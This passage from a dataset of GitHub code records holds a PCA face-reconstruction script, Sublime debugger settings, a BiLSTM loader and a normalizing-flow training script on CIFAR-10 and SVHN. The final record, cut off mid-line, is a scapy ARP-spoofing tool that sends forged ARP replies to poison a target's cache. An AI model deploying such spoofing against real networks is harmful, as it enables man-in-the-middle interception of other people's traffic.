dp_fibo[n+1] % 1234567\n'''","repo_name":"hongii/programmers_python","sub_path":"LV 2/멀리 뛰기.py","file_name":"멀리 뛰기.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43785616226","text":"import numpy as np\r\nfrom skimage import io\r\nimport sys\r\n'''\r\nimport os\r\n\r\na=os.path.join(sys.argv[1])\r\nprint(type(a))\r\nprint(len(a))\r\nprint(a)\r\nprint(b)\r\n'''\r\nprint(\"reading face\")\r\nrow_img = []\r\nfor i in range(415):\r\n row_img.append(io.imread(str(sys.argv[1])+\"/\"+str(i)+\".jpg\").reshape(600*600*3)*1.0)\r\nrow_img = np.array(row_img)\r\n\r\nprint(\"making average face\")\r\naverage_img = []\r\nfor i in range(600*600*3):\r\n average_img.append(np.sum(row_img[:, i])*1.0/415.0)\r\naverage_img = np.array(average_img)\r\n\r\nprint(\"computing SVD\")\r\nimg = []\r\nfor i in range(415):\r\n row_img[i] -= average_img\r\n img.append(row_img[i].reshape(600*600*3))\r\nimg = np.array(img)\r\nU, S, V = np.linalg.svd(img, full_matrices=False)\r\n\r\nprint(\"reconstruct\")\r\ntest_picture = io.imread(str(sys.argv[1])+\"/\"+sys.argv[2]).reshape(600*600*3)*1.0-average_img.reshape(600*600*3)\r\nprojection = np.dot(test_picture, V.T)\r\nprojection_4 = np.zeros(415)\r\nprojection_4[0:4] = projection[0:4]\r\nreconstruct_img = np.dot(projection_4, V) + average_img\r\nreconstruct_img -= np.min(reconstruct_img)\r\nreconstruct_img /= np.max(reconstruct_img)\r\nreconstruct_img = (reconstruct_img * 255).astype(np.uint8)\r\nreconstruct_img = reconstruct_img.reshape((600, 600, 3))\r\nio.imsave(\"reconstruction.jpg\", reconstruct_img)\r\n","repo_name":"R06942082/ML2017FALL","sub_path":"hw6/hw6_pca.py","file_name":"hw6_pca.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"20088577567","text":"DEFAULT_PORT = 4242 #9000\nDEFAULT_IDE_KEY = 'sublime.grld'\n\nPACKAGE_PATH = None\nPACKAGE_FOLDER = None\n\nFILE_LOG_OUTPUT = 'GRLD.log'\nFILE_BREAKPOINT_DATA = 'GRLD.breakpoints'\nFILE_PACKAGE_SETTINGS = 'GRLD.sublime-settings'\nFILE_WATCH_DATA = 'GRLD.expressions'\n\nKEY_SETTINGS = 'settings'\nKEY_GRLD = 'grld'\n\nKEY_PATH_MAPPING = \"path_mapping\"\nKEY_IDE_KEY = \"ide_key\"\nKEY_PORT = \"port\"\nKEY_SUPER_GLOBALS = \"super_globals\"\nKEY_MAX_DATA = \"max_data\"\nKEY_MAX_DEPTH = \"max_depth\"\nKEY_BREAK_ON_START = \"break_on_start\"\nKEY_BREAK_ON_EXCEPTION = \"break_on_exception\"\nKEY_CLOSE_ON_STOP = \"close_on_stop\"\nKEY_DISABLE_LAYOUT = \"disable_layout\"\nKEY_DEBUG_LAYOUT = \"debug_layout\"\nKEY_DISABLE_SUBLIME_LINTER_GUTTER = \"disable_sublime_linter_gutter\"\n\nKEY_BREAKPOINT_GROUP = \"breakpoint_group\"\nKEY_BREAKPOINT_INDEX = \"breakpoint_index\"\nKEY_CONTEXT_GROUP = \"context_group\"\nKEY_CONTEXT_INDEX = \"context_index\"\nKEY_STACK_GROUP = \"stack_group\"\nKEY_STACK_INDEX = \"stack_index\"\nKEY_WATCH_GROUP = \"watch_group\"\nKEY_WATCH_INDEX = \"watch_index\"\nKEY_COROUTINES_GROUP = \"coroutines_group\"\nKEY_COROUTINES_INDEX = \"coroutines_index\"\nKEY_EVALUATE_GROUP = \"evaluate_group\"\nKEY_EVALUATE_INDEX = \"evaluate_index\"\nKEY_ICONS_GROUP = \"icons_group\"\nKEY_ICONS_INDEX = \"icons_index\"\n\n\nKEY_BREAKPOINT_CURRENT = 'breakpoint_current'\nKEY_BREAKPOINT_DISABLED = 'breakpoint_disabled'\nKEY_BREAKPOINT_ENABLED = 'breakpoint_enabled'\nKEY_CURRENT_LINE = 'current_line'\n\nKEY_PYTHON_PATH = \"python_path\"\nKEY_DEBUG = \"debug\"\n\n# Region scope sources\nREGION_KEY_BREAKPOINT = 'grld_breakpoint'\nREGION_KEY_CURRENT = 'grld_current'\nREGION_KEY_DISABLED = 'grld_disabled'\nREGION_SCOPE_BREAKPOINT = 'comment.line.settings'\nREGION_SCOPE_CURRENT = 'string.quoted.settings'\n\n# Window layout for debugging output\nLAYOUT_DEBUG = {\n \"cols\": [0.0, 0.05, 0.15, 0.6, 1.0],\n \"rows\": [0.0, 0.7, 1.0],\n\t# main coroutines context stack icons\n \"cells\": [[1, 0, 4, 1], [0, 1, 2, 2], [2, 1, 3, 2], [3, 1, 4, 2], [0, 0, 1, 1]]\n}\n\n# Default single layout (similar to Alt+Shift+1)\nLAYOUT_NORMAL = {\n \"cols\": [0.0, 1.0],\n \"rows\": [0.0, 1.0],\n \"cells\": [[0, 0, 1, 1]]\n}\n\nRESTORE_LAYOUT = None\nRESTORE_INDEX = None\n\nSESSION_BUSY = False\n\nPROTOCOL = None\nBREAKPOINT = {}\nCONTEXT_DATA = {}\nWATCH = []\n\nBREAKPOINT_EXCEPTION = None\n# Breakpoint line number in script being debugged\nBREAKPOINT_ROW = None\n# Placholder for temporary breakpoint filename and line number\nBREAKPOINT_RUN = None\n# Will hold breakpoint line number to show for file which is being loaded\nSHOW_ROW_ONLOAD = {}\n\nCONFIG_PROJECT = None\nCONFIG_PACKAGE = None\nCONFIG_KEYS = [\n\tKEY_PATH_MAPPING,\n\tKEY_IDE_KEY,\n\tKEY_PORT,\n\tKEY_SUPER_GLOBALS,\n\tKEY_MAX_DATA,\n\tKEY_MAX_DEPTH,\n\tKEY_BREAK_ON_START,\n\tKEY_BREAK_ON_EXCEPTION,\n\tKEY_CLOSE_ON_STOP,\n\tKEY_DISABLE_LAYOUT,\n\tKEY_DEBUG_LAYOUT,\n\tKEY_BREAKPOINT_GROUP,\n\tKEY_BREAKPOINT_INDEX,\n\tKEY_CONTEXT_GROUP,\n\tKEY_CONTEXT_INDEX,\n\tKEY_STACK_GROUP,\n\tKEY_STACK_INDEX,\n\tKEY_WATCH_GROUP,\n\tKEY_WATCH_INDEX,\n\tKEY_BREAKPOINT_CURRENT,\n\tKEY_BREAKPOINT_DISABLED,\n\tKEY_BREAKPOINT_ENABLED,\n\tKEY_CURRENT_LINE,\n\tKEY_PYTHON_PATH,\n\tKEY_DEBUG\n]","repo_name":"robinvierich/SublimeTextGRLD","sub_path":"grld/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36076737898","text":"# import torch.nn as nn\n# import torch\n# from torch.autograd import *\n# import torch.optim as optim\n# import torch.nn.functional as F\n# import matplotlib.pyplot as plt\n\n\n\n# import pandas as pd\n# # import numpy as np\n# df=pd.read_csv(\"make_csv.csv\")\n#\n# train=df[df.columns[:3]]\n# y_train=df[df.columns[3:]]\n# train.shape,y_train.shape\n#\n# from sklearn.model_selection import train_test_split\n# train_x,test_x, train_y,test_y = train_test_split(train.values.reshape(-1,1,3), y_train.values, test_size=0.2, random_state=42)\n\n# Bilstm model\nimport torch.nn as nn\nimport torch\nfrom torch.autograd import *\n# import torch.optim as optim\n# import torch.nn.functional as F\n# import matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass BiLSTMNet(nn.Module):\n\n def __init__(self, input_size):\n super(BiLSTMNet, self).__init__()\n self.rnn = nn.LSTM(\n input_size=input_size,\n hidden_size=32,\n num_layers=1,\n batch_first=True,\n bidirectional=True\n )\n self.out = nn.Sequential(\n nn.Linear(64, 2)\n )\n\n def forward(self, x):\n r_out, (h_n, h_c) = self.rnn(x.view(len(x), 1, -1)) # None 表示 hidden state 会用全0的 state\n out = self.out(r_out[:, -1])\n # print(out.shape)\n return out\n\n\ndef ToVariable(x):\n tmp = torch.FloatTensor(x)\n return Variable(tmp)\n\n\n\n# net = BiLSTMNet(test_x.shape[-1])\n# criterion = nn.MSELoss()\n# optimizer = torch.optim.Adam(net.parameters(), lr=0.0001, weight_decay=0.001)\n\n\nimport joblib\nif __name__ == \"__main__\":\n net=joblib.load(filename=\"bilstm_model.joblib\")\n\n\n\ndef pre(x):\n x=x.reshape(-1,1,3)\n var_x = ToVariable(x)\n out = net(var_x)\n return out.detach().numpy()\n\n# print(pre(test_x))\n\n\ntest=np.array([0.5,1,1])\n\nprint(pre(test))\n\n\n","repo_name":"danielzph/hello_pytorch","sub_path":"example_use_pytorch/import-lstm_test.py","file_name":"import-lstm_test.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32662823936","text":"import argparse\nimport json\nimport numpy as np\nimport torch\nimport os\nimport tensorflow as tf\n\n# from tensorboardX import SummaryWriter\nfrom time import sleep\nfrom torch import optim\nfrom torch.nn import functional as F\nfrom torch.nn.utils import clip_grad_norm_\nfrom torch.utils import data\nfrom tqdm import tqdm\n\nimport data as data_\nimport nn as nn_\nimport utils\nimport datetime\nimport struct\nimport glob\nimport scipy\n\nfrom experiments import cutils\nfrom nde import distributions, flows, transforms\n\nclass parser_:\n pass\nargs = parser_()\n# parser = argparse.ArgumentParser()\n\n# data\n# parser.add_argument('--dataset_name', type=str, default='miniboone',\n# choices=['power', 'gas', 'hepmass', 'miniboone', 'bsds300'],\n# help='Name of dataset to use.')\nargs.dataset_name = 'cifar10'\n# parser.add_argument('--train_batch_size', type=int, default=64,\n# help='Size of batch used for training.')\nargs.train_batch_size = 64\n# parser.add_argument('--val_frac', type=float, default=1.,\n# help='Fraction of validation set to use.')\nargs.val_frac = 0.2\n\n# parser.add_argument('--val_batch_size', type=int, default=512,\n# help='Size of batch used for validation.')\nargs.val_batch_size=128\n# optimization\n# parser.add_argument('--learning_rate', type=float, default=3e-4,\n# help='Learning rate for optimizer.')\nargs.learning_rate = 3e-4\n# parser.add_argument('--num_training_steps', type=int, default=200000,\n# help='Number of total training steps.')\nargs.num_training_steps = 200000\n# parser.add_argument('--anneal_learning_rate', type=int, default=1,\n# choices=[0, 1],\n# help='Whether to anneal the learning rate.')\nargs.anneal_learning_rate = 1\n# parser.add_argument('--grad_norm_clip_value', type=float, default=5.,\n# help='Value by which to clip norm of gradients.')\nargs.grad_norm_clip_value = 5.\n# flow details\n# parser.add_argument('--base_transform_type', type=str, default='rq-autoregressive',\n# choices=['affine-coupling', 'quadratic-coupling', 'rq-coupling',\n# 'affine-autoregressive', 'quadratic-autoregressive',\n# 'rq-autoregressive'],\n# help='Type of transform to use between linear layers.')\nargs.base_transform_type = 'rq-autoregressive'\n# parser.add_argument('--linear_transform_type', type=str, default='lu',\n# choices=['permutation', 'lu', 'svd'],\n# help='Type of linear transform to use.')\nargs.linear_transform_type = 'lu'\n# parser.add_argument('--num_flow_steps', type=int, default=10,\n# help='Number of blocks to use in flow.')\nargs.num_flow_steps = 5\n# parser.add_argument('--hidden_features', type=int, default=256,\n# help='Number of hidden features to use in coupling/autoregressive nets.')\nargs.hidden_features = 256\n# parser.add_argument('--tail_bound', type=float, default=3,\n# help='Box is on [-bound, bound]^2')\nargs.tail_bound = 3\n# parser.add_argument('--num_bins', type=int, default=8,\n# help='Number of bins to use for piecewise transforms.')\nargs.num_bins = 8\n# parser.add_argument('--num_transform_blocks', type=int, default=2,\n# help='Number of blocks to use in coupling/autoregressive nets.')\nargs.num_transform_blocks=2\n# parser.add_argument('--use_batch_norm', type=int, default=0,\n# choices=[0, 1],\n# help='Whether to use batch norm in coupling/autoregressive nets.')\nargs.use_batch_norm = 0\n# parser.add_argument('--dropout_probability', type=float, default=0.25,\n# help='Dropout probability for coupling/autoregressive nets.')\nargs.dropout_probability = 0\n# parser.add_argument('--apply_unconditional_transform', type=int, default=1,\n# choices=[0, 1],\n# help='Whether to unconditionally transform \\'identity\\' '\n# 'features in coupling layer.')\nargs.apply_unconditional_transform = 1\n# logging and checkpoints\n# parser.add_argument('--monitor_interval', type=int, default=250,\n# help='Interval in steps at which to report training stats.')\nargs.monitor_interval = 25#0\n# reproducibility\n# parser.add_argument('--seed', type=int, default=1638128,\n# help='Random seed for PyTorch and NumPy.')\nargs.seed = 1638128\n# args = parser.parse_args()\nargs.activation = F.tanh\nargs.stop_cntr = 15\nargs.step_lim = 5000 ## num of steps after which to record best model\n\ntimestamp = str(datetime.datetime.now())[:-7].replace(' ', '-').replace(':', '-')\npath = os.path.join('checkpoint', '{}_steps{}_baseXfm{}_linXfm{}_h{}_BN{}_Blocks{}_UconXfm{}_{}'.format(\n args.dataset_name,\n args.num_flow_steps, args.base_transform_type, args.linear_transform_type, int(args.hidden_features), int(args.use_batch_norm), args.num_transform_blocks,\n int(args.apply_unconditional_transform),\n timestamp))\ntry:\n os.mkdir(path)\nexcept:\n pass\nrun_dir = os.path.join(r'C:\\Users\\justjo\\PycharmProjects\\nsf', path)\n# SummaryWriter = tf.summary.SummaryWriter\n\ntorch.manual_seed(args.seed)\nnp.random.seed(args.seed)\n\nassert torch.cuda.is_available()\ndevice = torch.device('cuda')\ntorch.set_default_tensor_type('torch.cuda.FloatTensor')\n\n# create data\n# train_dataset = data_.load_dataset(args.dataset_name, split='train')\n# train_loader = data.DataLoader(\n# train_dataset,\n# batch_size=args.train_batch_size,\n# shuffle=True,\n# drop_last=True\n# )\n# train_generator = data_.batch_generator(train_loader)\n# test_batch = next(iter(train_loader)).to(device)\n#\n# # validation set\n# val_dataset = data_.load_dataset(args.dataset_name, split='val', frac=args.val_frac)\n# val_loader = data.DataLoader(\n# dataset=val_dataset,\n# batch_size=args.val_batch_size,\n# shuffle=True,\n# drop_last=True\n# )\n#\n# # test set\n# test_dataset = data_.load_dataset(args.dataset_name, split='test')\n# test_loader = data.DataLoader(\n# dataset=test_dataset,\n# batch_size=args.val_batch_size,\n# shuffle=False,\n# drop_last=False\n# )\n############## MNIST ####################\n# def read_idx(filename):\n# with open(filename, 'rb') as f:\n# zero, data_type, dims = struct.unpack('>HBB', f.read(4))\n# shape = tuple(struct.unpack('>I', f.read(4))[0] for d in range(dims))\n# return np.fromstring(f.read(), dtype=np.uint8).reshape(shape)\n#\n# dtrain = read_idx(r'C:\\Users\\justjo\\Downloads\\public_datasets/FasionMNIST/train-images-idx3-ubyte')\n# dtrain = dtrain.reshape((dtrain.shape[0],-1))/128. - 1.\n# train_idx = np.arange(dtrain.shape[0])\n# np.random.shuffle(train_idx)\n#\n# dtest = read_idx(r'C:\\Users\\justjo\\Downloads\\public_datasets/FasionMNIST/t10k-images-idx3-ubyte')\n# dtest = dtest.reshape((dtest.shape[0],-1))/128. - 1.\n#\n# # fnames_data = [r'C:\\Users\\justjo\\Downloads\\public_datasets/MNIST/train-images.idx3-ubyte', r'C:\\Users\\justjo\\Downloads\\public_datasets/MNIST/t10k-images.idx3-ubyte']\n# # cont_data = []\n# # for f in fnames_data:\n# # cont_data.append(read_idx(f))\n# # cont_data = np.concatenate(cont_data)\n# cont_data = read_idx(r'C:\\Users\\justjo\\Downloads\\public_datasets/MNIST/t10k-images.idx3-ubyte')\n# cont_data = cont_data.reshape((cont_data.shape[0],-1))/128. - 1.\n# # cont_data = cont_data[np.random.choice(cont_data.shape[0],10000, False), :]\n########### CIFAR10 ###############################\nfnames_cifar = glob.glob(r'C:\\Users\\justjo\\Downloads\\public_datasets\\cifar-10-python\\cifar-10-batches-py\\train\\*')\ndtrain=[np.load(f, allow_pickle=True, encoding='latin1') for f in fnames_cifar]\ndtrain = np.concatenate([a['data'] for a in dtrain])/128. - 1.\ntrain_idx = np.arange(dtrain.shape[0])\nnp.random.shuffle(train_idx)\n\ndtest = np.load(r'C:\\Users\\justjo\\Downloads\\public_datasets\\cifar-10-python\\cifar-10-batches-py\\test\\test_batch', allow_pickle=True, encoding='latin1')\ndtest = dtest['data']/128. - 1.\n\ncont_data = scipy.io.loadmat(r'C:\\Users\\justjo\\Downloads\\public_datasets\\SVHN.mat')\ncont_data = np.moveaxis(cont_data['X'],3,0)\ncont_data = np.reshape(cont_data, (cont_data.shape[0],-1))/128. - 1.\n# cont_data = cont_data[np.random.choice(cont_data.shape[0],10000, False), :]\n#################################################\n\ntrain_dataset = torch.utils.data.TensorDataset(\n torch.from_numpy(dtrain[train_idx[:-int(args.val_frac*dtrain.shape[0])]]).float())\n# train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.train_batch_size, shuffle=True)\ntrain_loader = data.DataLoader(\n train_dataset,\n batch_size=args.train_batch_size,\n shuffle=True,\n drop_last=True\n)\ntrain_generator = data_.batch_generator(train_loader)\ntest_batch = next(iter(train_loader))[0].to(device)\n\nval_dataset = torch.utils.data.TensorDataset(\n torch.from_numpy(dtrain[train_idx[-int(args.val_frac*dtrain.shape[0]):]]).float())\n# val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.val_batch_size, shuffle=True)\nval_loader = data.DataLoader(\n dataset=val_dataset,\n batch_size=args.val_batch_size,\n shuffle=True,\n drop_last=True\n)\nval_generator = data_.batch_generator(val_loader)\n\ntest_dataset = torch.utils.data.TensorDataset(\n torch.from_numpy(dtest).float())\n# test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=args.val_batch_size, shuffle=False)\ntest_loader = data.DataLoader(\n dataset=test_dataset,\n batch_size=args.val_batch_size,\n shuffle=False,\n drop_last=False\n)\ntest_generator = data_.batch_generator(test_loader)\n\ncont_dataset = torch.utils.data.TensorDataset(\n torch.from_numpy(cont_data).float())\n# test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=args.val_batch_size, shuffle=False)\ncont_loader = data.DataLoader(\n dataset=cont_dataset,\n batch_size=args.val_batch_size,\n shuffle=False,\n drop_last=False\n)\ncont_generator = data_.batch_generator(cont_loader)\n\nfeatures = test_batch.shape[1]\n# features = train_dataset.dim\n\ndef create_linear_transform():\n if args.linear_transform_type == 'permutation':\n return transforms.RandomPermutation(features=features)\n elif args.linear_transform_type == 'lu':\n return transforms.CompositeTransform([\n transforms.RandomPermutation(features=features),\n transforms.LULinear(features, identity_init=True)\n ])\n elif args.linear_transform_type == 'svd':\n return transforms.CompositeTransform([\n transforms.RandomPermutation(features=features),\n transforms.SVDLinear(features, num_householder=10, identity_init=True)\n ])\n else:\n raise ValueError\n\n\ndef create_base_transform(i):\n if args.base_transform_type == 'affine-coupling':\n return transforms.AffineCouplingTransform(\n mask=utils.create_alternating_binary_mask(features, even=(i % 2 == 0)),\n transform_net_create_fn=lambda in_features, out_features: nn_.ResidualNet(\n in_features=in_features,\n out_features=out_features,\n hidden_features=args.hidden_features,\n context_features=None,\n num_blocks=args.num_transform_blocks,\n activation=args.activation,\n dropout_probability=args.dropout_probability,\n use_batch_norm=args.use_batch_norm\n )\n )\n elif args.base_transform_type == 'quadratic-coupling':\n return transforms.PiecewiseQuadraticCouplingTransform(\n mask=utils.create_alternating_binary_mask(features, even=(i % 2 == 0)),\n transform_net_create_fn=lambda in_features, out_features: nn_.ResidualNet(\n in_features=in_features,\n out_features=out_features,\n hidden_features=args.hidden_features,\n context_features=None,\n num_blocks=args.num_transform_blocks,\n activation=args.activation,\n dropout_probability=args.dropout_probability,\n use_batch_norm=args.use_batch_norm\n ),\n num_bins=args.num_bins,\n tails='linear',\n tail_bound=args.tail_bound,\n apply_unconditional_transform=args.apply_unconditional_transform\n )\n elif args.base_transform_type == 'rq-coupling':\n return transforms.PiecewiseRationalQuadraticCouplingTransform(\n mask=utils.create_alternating_binary_mask(features, even=(i % 2 == 0)),\n transform_net_create_fn=lambda in_features, out_features: nn_.ResidualNet(\n in_features=in_features,\n out_features=out_features,\n hidden_features=args.hidden_features,\n context_features=None,\n num_blocks=args.num_transform_blocks,\n activation=args.activation,\n dropout_probability=args.dropout_probability,\n use_batch_norm=args.use_batch_norm\n ),\n num_bins=args.num_bins,\n tails='linear',\n tail_bound=args.tail_bound,\n apply_unconditional_transform=args.apply_unconditional_transform\n )\n elif args.base_transform_type == 'affine-autoregressive':\n return transforms.MaskedAffineAutoregressiveTransform(\n features=features,\n hidden_features=args.hidden_features,\n context_features=None,\n num_blocks=args.num_transform_blocks,\n use_residual_blocks=True,\n random_mask=False,\n activation=args.activation,\n dropout_probability=args.dropout_probability,\n use_batch_norm=args.use_batch_norm\n )\n elif args.base_transform_type == 'quadratic-autoregressive':\n return transforms.MaskedPiecewiseQuadraticAutoregressiveTransform(\n features=features,\n hidden_features=args.hidden_features,\n context_features=None,\n num_bins=args.num_bins,\n tails='linear',\n tail_bound=args.tail_bound,\n num_blocks=args.num_transform_blocks,\n use_residual_blocks=True,\n random_mask=False,\n activation=args.activation,\n dropout_probability=args.dropout_probability,\n use_batch_norm=args.use_batch_norm\n )\n elif args.base_transform_type == 'rq-autoregressive':\n return transforms.MaskedPiecewiseRationalQuadraticAutoregressiveTransform(\n features=features,\n hidden_features=args.hidden_features,\n context_features=None,\n num_bins=args.num_bins,\n tails='linear',\n tail_bound=args.tail_bound,\n num_blocks=args.num_transform_blocks,\n use_residual_blocks=True,\n random_mask=False,\n activation=args.activation,\n dropout_probability=args.dropout_probability,\n use_batch_norm=args.use_batch_norm\n )\n else:\n raise ValueError\n\ndef create_transform():\n transform = transforms.CompositeTransform([\n transforms.CompositeTransform([\n create_linear_transform(),\n create_base_transform(i)\n ]) for i in range(args.num_flow_steps)\n ] + [\n create_linear_transform()\n ])\n return transform\n\n# create model\ndistribution = distributions.StandardNormal((features,))\ntransform = create_transform()\nflow = flows.Flow(transform, distribution).to(device)\n\nn_params = utils.get_num_parameters(flow)\nprint('There are {} trainable parameters in this model.'.format(n_params))\n\n# create optimizer\noptimizer = optim.Adam(flow.parameters(), lr=args.learning_rate)\nif args.anneal_learning_rate:\n scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, args.num_training_steps, 0)\nelse:\n scheduler = None\n\n# create summary writer and write to log directory\n# timestamp = cutils.get_timestamp()\n# if cutils.on_cluster():\n# timestamp += '||{}'.format(os.environ['SLURM_JOB_ID'])\n# log_dir = os.path.join(path, args.dataset_name, timestamp)\n# while True:\n# try:\n# # writer = SummaryWriter(log_dir=log_dir, max_queue=20)\nwriter = tf.summary.create_file_writer(run_dir, max_queue=20)\nwriter.set_as_default()\n\n# break\n# except FileExistsError:\n# sleep(5)\n# filename = os.path.join(log_dir, 'config.json')\n# with open(filename, 'w') as file:\n# json.dump(vars(args), file)\nwith open(os.path.join(run_dir, 'args.json'), 'w') as f:\n json.dump(str(args.__dict__), f, indent=4, sort_keys=True)\n\ntbar = tqdm(range(args.num_training_steps))\nbest_val_score = -1e10\ntorch.cuda.empty_cache()\nstop_cntr = 0\nfor step in tbar:\n flow.train()\n if args.anneal_learning_rate:\n scheduler.step(step)\n optimizer.zero_grad()\n\n batch = next(train_generator)[0].to(device)\n log_density = flow.log_prob(batch)\n loss = - torch.mean(log_density)\n loss.backward()\n if args.grad_norm_clip_value is not None:\n clip_grad_norm_(flow.parameters(), args.grad_norm_clip_value)\n optimizer.step()\n\n tf.summary.scalar(name='loss', data=loss.item(), step=step)\n\n ## option #1 for val monitoring\n flow.eval()\n with torch.no_grad():\n val_batch = next(val_generator)\n log_density_val = flow.log_prob(val_batch[0].to(device).detach())\n mean_log_density_val = torch.mean(log_density_val).detach()\n running_val_log_density = mean_log_density_val.cpu().numpy()\n\n test_batch = next(test_generator)\n log_density_test = flow.log_prob(test_batch[0].to(device).detach())\n mean_log_density_test = torch.mean(log_density_test).detach()\n running_test_log_density = mean_log_density_test.cpu().numpy()\n\n cont_batch = next(cont_generator)\n log_density_cont = flow.log_prob(cont_batch[0].to(device).detach())\n mean_log_density_cont = torch.mean(log_density_cont).detach()\n running_cont_log_density = mean_log_density_cont.cpu().numpy()\n\n if running_val_log_density > best_val_score:\n best_val_score = running_val_log_density\n stop_cntr = 0\n if step > args.step_lim:\n model_holder = flow.cpu().state_dict().copy()\n flow.cuda().state_dict()\n else:\n stop_cntr += 1\n if stop_cntr > args.stop_cntr:\n break\n\n # ## option #2 for val monitoring\n # if (step + 1) % args.monitor_interval == 0:\n # flow.eval()\n #\n # with torch.no_grad():\n # # compute validation score\n # running_val_log_density = 0\n # for val_batch in val_loader:\n # log_density_val = flow.log_prob(val_batch[0].to(device).detach())\n # mean_log_density_val = torch.mean(log_density_val).detach()\n # running_val_log_density += mean_log_density_val.cpu().numpy()\n # running_val_log_density /= len(val_loader)\n #\n # ####### save best model #### don't use if want to run faster...or wait until reaching a certain best score\n # if running_val_log_density > best_val_score:\n # best_val_score = running_val_log_density\n # stop_cntr = 0\n # if step > args.step_lim:\n # model_holder = flow.cpu().state_dict().copy()\n # flow.cuda().state_dict()\n # with torch.no_grad():\n # running_test_log_density = 0\n # for test_batch in test_loader:\n # log_density_test = flow.log_prob(test_batch[0].to(device).detach())\n # mean_log_density_test = torch.mean(log_density_test).detach()\n # running_test_log_density += mean_log_density_test.cpu().numpy()\n # running_test_log_density /= len(test_loader)\n # running_cont_log_density = 0\n # for cont_batch in cont_loader:\n # log_density_cont = flow.log_prob(cont_batch[0].to(device).detach())\n # mean_log_density_cont = torch.mean(log_density_cont).detach()\n # running_cont_log_density += mean_log_density_cont.cpu().numpy()\n # running_cont_log_density /= len(cont_loader)\n # else:\n # stop_cntr+= 1\n # if stop_cntr > args.stop_cntr:\n # break\n # # path_ = os.path.join(cutils.get_checkpoint_root(),\n # # '{}-best-val-{}.t'.format(args.dataset_name, timestamp))\n # path_ = os.path.join(run_dir,\n # '{}-best-val-{}.t'.format(args.dataset_name, timestamp))\n # torch.save(flow.state_dict(), path_)\n\n # compute reconstruction\n # with torch.no_grad():\n # test_batch_noise = flow.transform_to_noise(test_batch)\n # test_batch_reconstructed, _ = flow._transform.inverse(test_batch_noise)\n # errors = test_batch - test_batch_reconstructed\n # max_abs_relative_error = torch.abs(errors / test_batch).max()\n # average_abs_relative_error = torch.abs(errors / test_batch).mean()\n # tf.summary.scalar('max-abs-relative-error',\n # max_abs_relative_error.cpu().numpy(), step=step)\n # tf.summary.scalar('average-abs-relative-error',\n # average_abs_relative_error.cpu().numpy(), step=step)\n\n # summaries = {\n # 'val': running_val_log_density.item(),\n # 'best-val': best_val_score.item(),\n # 'max-abs-relative-error': max_abs_relative_error.item(),\n # 'average-abs-relative-error': average_abs_relative_error.item()\n # }\n summaries = {\n 'val': running_val_log_density,\n 'best-val': best_val_score,\n 'test': running_test_log_density,\n 'cont_data': running_cont_log_density\n # 'max-abs-relative-error': max_abs_relative_error,\n # 'average-abs-relative-error': average_abs_relative_error\n }\n for summary, value in summaries.items():\n tf.summary.scalar(name=summary, data=value, step=step)\n\n\n####### load best val model\n# path = os.path.join(cutils.get_checkpoint_root(),\n# '{}-best-val-{}.t'.format(args.dataset_name, timestamp))\nflow.load_state_dict(model_holder)\npath_ = os.path.join(run_dir,\n '{}-best-val-{}.t'.format(args.dataset_name, timestamp))\ntorch.save(model_holder, path_)\n# flow.load_state_dict(torch.load(path_))\n# flow.eval()\n# calculate log-likelihood on test set\nwith torch.no_grad():\n log_likelihood = torch.Tensor([])\n for batch in tqdm(test_loader):\n log_density = flow.log_prob(batch[0].to(device))\n log_likelihood = torch.cat([\n log_likelihood,\n log_density\n ])\n# calculate log-likelihood on contrastive set\nwith torch.no_grad():\n log_likelihood_cont = torch.Tensor([])\n for batch in tqdm(cont_loader):\n log_density = flow.log_prob(batch[0].to(device))\n log_likelihood_cont = torch.cat([\n log_likelihood_cont,\n log_density\n ])\n\npath_ = os.path.join(run_dir, '{}-{}-log-likelihood.npy'.format(\n args.dataset_name,\n args.base_transform_type\n))\nnp.save(path_, utils.tensor2numpy(log_likelihood))\nmean_log_likelihood = log_likelihood.mean()\nstd_log_likelihood = log_likelihood.std()\n\n# save log-likelihood\ns = 'Final score for {}: {:.2f} +- {:.2f}'.format(\n args.dataset_name.capitalize(),\n mean_log_likelihood.item(),\n 2 * std_log_likelihood.item() / np.sqrt(len(test_dataset))\n)\nprint(s)\nfilename = os.path.join(run_dir, 'test-results.txt')\nwith open(filename, 'w') as file:\n file.write(s)\n","repo_name":"johnpjust/nsf","sub_path":"experiments/uci.py","file_name":"uci.py","file_ext":"py","file_size_in_byte":23743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"30195881348","text":"import scapy.all as scapy\nfrom time import sleep\nfrom argparse import ArgumentParser\n\ndef get_arguments():\n parser = ArgumentParser()\n parser.add_argument(\"-i1\", \"--target-ip\", required=True, help=\"Target IP\", \n metavar=\"T.IP\", dest=\"ip1\")\n\n parser.add_argument(\"-i2\", \"--source-ip\", required=True, help=\"Source IP\",\n metavar=\"S.IP\", dest=\"ip2\")\n \n args = parser.parse_args()\n return args\n\ndef spoof(target_ip, source_ip):\n target_mac = scapy.srp(scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")/scapy.ARP(pdst=target_ip), \n timeout=1, verbose=False)[0]\n scapy.send(scapy.ARP(op=2, psrc=source_ip, pdst=target_ip, hwdst=target_mac[0][1]), \n count=4, verbose=False)\n\ndef restore(dest_ip, source_ip):\n dest_mac = scapy.srp(scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")/scapy.ARP(pdst=dest_ip),\n timeout=1, verbose=False)[0][0][1]\n source_mac = scapy.srp(scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")/scapy.ARP(pdst=source_ip),\n timeout=1, verbose=False)[0][0][1]\n scapy.send(scapy.ARP(op=2, psrc=source_ip, pdst=dest_ip, 